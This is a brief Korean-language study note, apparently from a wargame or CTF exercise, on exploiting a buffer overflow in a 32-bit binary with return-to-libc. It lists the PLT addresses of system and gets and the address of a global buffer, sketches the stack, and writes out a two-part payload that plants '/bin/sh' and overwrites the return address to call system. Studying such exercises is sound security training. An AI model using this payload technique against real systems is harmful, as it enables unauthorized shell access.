rtl 풀이

info var - 전역변수 정보 받아오기

info func

0x0804a060  Name 

\60\a0\04\08

0x08048360  gets@plt
0x08048370  puts@plt
0x08048380  system@plt 

\80\83\04\08


함수 실행 순서 puts -> puts -> system -> scanf -> gets 

예상 스택


scaf.ebt
scanf.ret

buf[100]
gets.ebp
gets.ret 




get에서 100바이트 입력받음

Name에 "/bin/sh"  삽입

페이로드 순서 : "/bin/sh"(scanf,Name) + 더미 100바이트 + ebp + system@plt(0x08048380) + 더미 4바이트 + Name 주소  (0x0804a060)

"/bin/sh"
"a"*104+"\80\83\04\08"+"a"*4+"\60\a0\04\08"

이떄 scanf 와 gets는 따로 입력받아야 하므로,
두개의 페이로드를 나눠서 작성하고 따로 보내주자.
문자열의 끝을 알리는 \00을 끝에 넣어주고,
해당 남은 부분 만큼은 더미로 가득 채워준다.

최종페이로드
"/bin/sh\00"+"a"*192
a"*104+p32(0x08048380)+"a"*4+p32(0x0804a060)


